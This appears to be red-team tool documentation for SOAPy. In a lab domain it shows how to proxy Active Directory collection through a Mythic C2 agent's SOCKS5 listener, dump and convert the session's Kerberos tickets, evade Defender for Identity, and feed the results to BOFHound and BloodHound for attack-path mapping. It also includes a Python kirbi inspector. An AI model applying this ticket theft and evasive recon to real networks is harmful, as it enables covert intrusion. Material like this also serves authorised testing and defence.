Recon
The supported way to collect Active Directory data with SOAPy is through a SOCKS5 proxy started on a C2 agent inside the target environment. Once a C2 agent is running on a workstation as a low-privilege domain user, a post-exploitation utility can extract Kerberos tickets from that session even when Credential Guard is enabled on the compromised host. Those tickets are then used to authenticate ADWS traffic proxied over the agent's SOCKS5 listener into the environment. An operator can therefore land on a host and, without any plaintext credentials, perform opsec-safe AD collection without running recon tradecraft on the host itself over the C2 channel.
SOAPy can issue constrained queries over ADWS to identify potentially vulnerable assets without alerting identity-focused defensive platforms such as Microsoft Defender for Identity (MDI). The data retrieved from AD can be transformed into BloodHound-compatible JSON with Matt Creel's BOFHound and uploaded to BloodHound for attack path visualization and post-processing. All examples use the Mythic C2 agent Apollo.
After achieving execution on a remote host within the target environment, start a SOCKS5 proxy through Mythic.
```
[Sun May 10 2026 06:07 PM] > socks -Action start -Port 7010
Started SOCKS5 server on port 7010
Updating Sleep to 0
```
To proxy traffic through the agent with proxychains4, edit /etc/proxychains4.conf. Change the last line of the [ProxyList] section to use the socks5 protocol and to point at the Mythic server on the port opened for the proxy. The SOCKS5 listener is bound on the Mythic server, not on the agent, so 127.0.0.1 is correct only when proxychains4 runs on the teamserver itself; from any other host, use the teamserver's reachable address.
```
┌──(kali㉿LG-kali)-[~]
└─$ sudo vim /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
socks5 127.0.0.1 7010
```
Extract Kerberos tickets from the current logon session. For best opsec, use a BOF that requests the tickets from the LSA over RPC rather than reading LSASS memory. If Credential Guard is enabled, dump a service ticket for LDAP instead of the TGT, since Credential Guard protects only the TGT. The listing below shows both the krbtgt TGT and the ldap/dc01 service ticket for the session; in this lab Credential Guard was not a factor and the TGT was dumped.
| CLIENT | SERVICE | LUID | END |
| ------ | ------- | ---- | --- |
| domainuser@LUDUS.DOMAIN | krbtgt/LUDUS.DOMAIN@LUDUS.DOMAIN | 0x4c731 | 5/11/2026 4:55:34 AM |
| domainuser@LUDUS.DOMAIN | HTTP/sccm-mgmt.ludus.domain@LUDUS.DOMAIN | 0x4c731 | 5/11/2026 4:55:34 AM |
| domainuser@LUDUS.DOMAIN | LDAP/DC01.ludus.domain/ludus.domain@LUDUS.DOMAIN | 0x4c731 | 5/11/2026 4:55:34 AM |
| domainuser@LUDUS.DOMAIN | ldap/dc01.ludus.domain@LUDUS.DOMAIN | 0x4c731 | 5/11/2026 4:55:34 AM |

| CLIENT | SERVICE | TICKET |
| ------ | ------- | ------ |
| domainuser@LUDUS.DOMAIN | krbtgt/LUDUS.DOMAIN@LUDUS.DOMAIN | doIFnjCCBZqgAwIBBaEDAgEWooI...[snip]... |
Copy the base64 blob from the teamserver output and decode it on the system that will run SOAPy. The decoded bytes are a kirbi (a KRB-CRED structure); convert it to ccache format with impacket's ticketConverter.py so SOAPy can use it through KRB5CCNAME.
```
┌──(kali㉿LG-kali)-[~]
└─$ echo 'doIFnjCCBZqgAwIBBaEDAgEWooIEoTCCBJ1hggSZMIIElaA...[snip]...ET01BSU4=' | base64 -d > ticket.kirbi
┌──(kali㉿LG-kali)-[~]
└─$ ticketConverter.py ./ticket.kirbi ticket.ccache
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
```
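ticketConverter.py does not care which service the ticket is for or whether it is still valid, and a wrong choice only surfaces later as an authentication failure through the proxy. The following is an added example, not SOAPy's or the page's own code, that inspects a base64 kirbi before conversion with a small hand-written DER walker (no impacket or pyasn1 needed): it reads the client, service principal and expiry from the cleartext EncKrbCredPart, flags a krbtgt ticket so the Credential Guard caveat above can be applied, and flags expired tickets. The sample kirbi it decodes is constructed in the block by a matching encoder with dummy cipher and key bytes and an assumed expiry; the realm and names echo the lab above but the ticket is not real.

```python
"""Inspect a base64 kirbi (KRB-CRED) before converting it to ccache.

Added example, not SOAPy's or the page's own code. A minimal DER walker reads
the cleartext parts of a KRB-CRED whose enc-part uses etype 0 (unencrypted,
as in tickets exported from the LSA cache). The sample kirbi is constructed
below with dummy cipher/key bytes and an assumed expiry; it is not a real ticket.
"""
import base64
from datetime import datetime, timezone


# ---- DER decoding (Kerberos structures use only single-byte tags) ---------
def der_tlv(buf, pos=0):
    """Decode one TLV at pos; returns (tag, payload, next_pos)."""
    tag = buf[pos]
    if tag & 0x1F == 0x1F:
        raise ValueError("unexpected multi-byte tag")
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                                   # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def der_children(payload):
    """Split a constructed payload (SEQUENCE, [n], APPLICATION) into TLVs."""
    out, pos = [], 0
    while pos < len(payload):
        tag, body, pos = der_tlv(payload, pos)
        out.append((tag, body))
    return out


def field(seq_fields, n):
    """Return the single TLV wrapped by context tag [n] (0xA0|n), or None."""
    for tag, body in seq_fields:
        if tag == 0xA0 | n:
            return der_children(body)[0]
    return None


def principal(pn_payload):
    """PrincipalName SEQUENCE -> 'part/part' (name-type is ignored)."""
    _, strings = field(der_children(pn_payload), 1)     # [1] name-string
    return "/".join(s.decode() for _, s in der_children(strings))


def inspect_kirbi(b64, now=None):
    """One dict per KrbCredInfo: client, service, end, is_tgt, expired."""
    now = now or datetime.now(timezone.utc)
    tag, body, _ = der_tlv(base64.b64decode(b64))
    if tag != 0x76:                                     # [APPLICATION 22] KRB-CRED
        raise ValueError("not a KRB-CRED: leading tag 0x%02x" % tag)
    fields = der_children(der_children(body)[0][1])
    enc = der_children(field(fields, 3)[1])             # [3] EncryptedData
    etype = int.from_bytes(field(enc, 0)[1], "big", signed=True)
    if etype != 0:
        raise ValueError("KRB-CRED enc-part is encrypted (etype %d)" % etype)
    ptag, pbody, _ = der_tlv(field(enc, 2)[1])          # [2] cipher holds EncKrbCredPart
    if ptag != 0x7D:                                    # [APPLICATION 29]
        raise ValueError("enc-part is not an EncKrbCredPart")
    infos = field(der_children(der_children(pbody)[0][1]), 0)[1]   # [0] ticket-info
    out = []
    for _, info in der_children(infos):
        f = der_children(info)                          # prealm/pname assumed present
        service = principal(field(f, 9)[1]) + "@" + field(f, 8)[1].decode()
        end = datetime.strptime(field(f, 6)[1].decode(), "%Y%m%d%H%M%SZ")
        end = end.replace(tzinfo=timezone.utc)
        out.append({"client": principal(field(f, 2)[1]) + "@" + field(f, 1)[1].decode(),
                    "service": service, "end": end,
                    "is_tgt": service.lower().startswith("krbtgt/"),
                    "expired": end <= now})
    return out


# ---- DER encoding, used only to construct the sample ----------------------
def tlv(tag, payload):
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload


def seq(*items): return tlv(0x30, b"".join(items))
def ctx(n, inner): return tlv(0xA0 | n, inner)
def integer(v): return tlv(0x02, bytes([v]))            # values < 128 only
def gstring(s): return tlv(0x1B, s.encode())            # GeneralString
def ktime(dt): return tlv(0x18, dt.strftime("%Y%m%d%H%M%SZ").encode())
def pname(ntype, *parts): return seq(ctx(0, integer(ntype)), ctx(1, seq(*map(gstring, parts))))


SAMPLE_END = datetime(2026, 5, 11, 4, 55, 34, tzinfo=timezone.utc)   # assumed expiry


def build_sample_kirbi():
    """Constructed ldap/ service ticket for domainuser; cipher and key are dummies."""
    realm, sname = "LUDUS.DOMAIN", pname(2, "ldap", "dc01.ludus.domain")
    ticket = tlv(0x61, seq(                             # [APPLICATION 1] Ticket
        ctx(0, integer(5)), ctx(1, gstring(realm)), ctx(2, sname),
        ctx(3, seq(ctx(0, integer(18)), ctx(1, integer(2)), ctx(2, tlv(0x04, b"\x00" * 16))))))
    info = seq(                                         # KrbCredInfo
        ctx(0, seq(ctx(0, integer(18)), ctx(1, tlv(0x04, b"\x11" * 32)))),
        ctx(1, gstring(realm)), ctx(2, pname(1, "domainuser")), ctx(6, ktime(SAMPLE_END)),
        ctx(8, gstring(realm)), ctx(9, sname))
    cred_part = tlv(0x7D, seq(ctx(0, seq(info))))       # [APPLICATION 29] EncKrbCredPart
    return base64.b64encode(tlv(0x76, seq(              # [APPLICATION 22] KRB-CRED, etype 0
        ctx(0, integer(5)), ctx(1, integer(22)), ctx(2, seq(ticket)),
        ctx(3, seq(ctx(0, integer(0)), ctx(2, tlv(0x04, cred_part))))))).decode()


if __name__ == "__main__":
    for entry in inspect_kirbi(build_sample_kirbi()):
        print(entry)
```

Feed it the blob copied from the teamserver instead of the constructed sample to confirm the service principal is the one you intend to use and that END has not passed before spending a proxychains round trip on it. Only etype 0 KRB-CREDs are readable; a kirbi whose EncKrbCredPart is actually encrypted is rejected rather than misreported.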
Run SOAPy collection through the SOCKS5 proxy on the Apollo agent using the Kerberos ticket (-k, with KRB5CCNAME pointing at the ccache), which removes the need for the user's plaintext password or NT hash. Any query or action can be run through the proxy; the example below enumerates computer accounts in AD. Constrained queries are recommended for opsec; see the operational blog for more information.
```
┌──(kali㉿LG-kali)-[~]
└─$ KRB5CCNAME=ticket.ccache proxychains4 SOAPy -k ludus.domain/'domainuser'@dc01.ludus.domain -q '(objectclass=computer)' | tee data/computers.log
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
███████╗ ██████╗  █████╗ ██████╗ ██╗   ██╗
██╔════╝██╔═══██╗██╔══██╗██╔══██╗╚██╗ ██╔╝
███████╗██║   ██║███████║██████╔╝ ╚████╔╝
╚════██║██║   ██║██╔══██║██╔═══╝   ╚██╔╝
███████║╚██████╔╝██║  ██║██║        ██║
╚══════╝ ╚═════╝ ╚═╝  ╚═╝╚═╝        ╚═╝
v1.0.0
@_logangoins
github.com/jlevere
[*] Connecting to dc01.ludus.domain for resource:Enumeration
[proxychains] Strict chain ... 127.0.0.1:7010 ... dc01.ludus.domain:9389 ... OK
[proxychains] Strict chain ... 127.0.0.1:7010 ... dc01.ludus.domain:88 ... OK
[*] Using query: (objectclass=computer)
[*] Using distingushedName: DC=ludus,DC=domain
--------------------
rIDSetReferences: CN=RID Set,CN=DC01,OU=Domain Controllers,DC=ludus,DC=domain
logonCount: 1229
codePage: 0
objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=ludus,DC=domain
msDFSR-ComputerReferenceBL: CN=DC01,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=ludus,DC=domain
isCriticalSystemObject: TRUE
operatingSystem: Windows Server 2022 Standard Evaluation
localPolicyFlags: 0
instanceType: 4
nTSecurityDescriptor: AQAEjBAJAAAsCQAAAAAAABQAAAAEAPwILgAAAAUASAAgAAAAAwAAABAgIF+ledARkCAAwE/C1M+Gepa/5g3QEaKFAKoAMEniAQUAAAAAAAUVAAAAwT4rtvtVUeMDdzCgAAIAAAUASAAgAAAAAwAAAFB5lr/mDdARooUAqgAwSeKGepa...[snip]...
```
Once the output has been saved, Matt Creel's BOFHound can transform it into BloodHound-compatible JSON for upload and attack path discovery. Because BOFHound parses the saved files from a directory, results from several sessions can be accumulated and processed together, so collection can be spread over time to lower the chance of detection while gathering data.
```
┌──(kali㉿LG-kali)-[~]
└─$ bofhound -i data --zip
_____________________________ __ __ ______ __ __ __ __ _______
| _ / / __ / | ____/| | | | / __ \ | | | | | \ | | | \
| |_) | | | | | | |__ | |__| | | | | | | | | | | \| | | .--. |
| _ < | | | | | __| | __ | | | | | | | | | | . ` | | | | |
| |_) | | `--' | | | | | | | | `--' | | `--' | | |\ | | '--' |
|______/ \______/ |__| |__| |___\_\________\_\________\|__| \___\|_________\
<< @coffeegist | @Tw1sm >>
[19:31:15] INFO Parsed 13 LDAP objects
...[snip]...
[19:31:15] INFO Parsed 99 ACL relationships
[19:31:15] INFO Created default users
[19:31:15] INFO Created default groups
[19:31:15] INFO Resolved group memberships
[19:31:15] INFO Resolved delegation relationships
[19:31:15] INFO Resolved OU memberships
[19:31:15] INFO Linked GPOs to OUs
[19:31:15] INFO Assigned IP addresses to computers
[19:31:15] INFO JSON files written to current directory
[19:31:15] INFO Files compressed into bloodhound_20260510_193115.zip
```